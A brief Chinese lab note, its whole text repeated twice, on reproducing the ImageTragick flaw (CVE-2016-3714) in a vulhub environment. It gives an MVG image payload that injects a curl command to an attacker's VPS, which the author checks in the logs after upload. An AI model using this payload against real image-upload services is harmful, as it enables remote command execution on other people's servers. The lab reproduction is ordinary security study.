CVE-2016–3714:
闲着没事突然想起这个洞来,借用vulhub复现一下
poc有很多:https://github.com/ImageTragick/PoCs
我用的
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/oops.jpg"|curl "ip:port/image)'
pop graphic-context
图片上传后,vps查看日志
CVE-2016–3714:
闲着没事突然想起这个洞来,借用vulhub复现一下
poc有很多:https://github.com/ImageTragick/PoCs
我用的
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/oops.jpg"|curl "ip:port/image)'
pop graphic-context
图片上传后,vps查看日志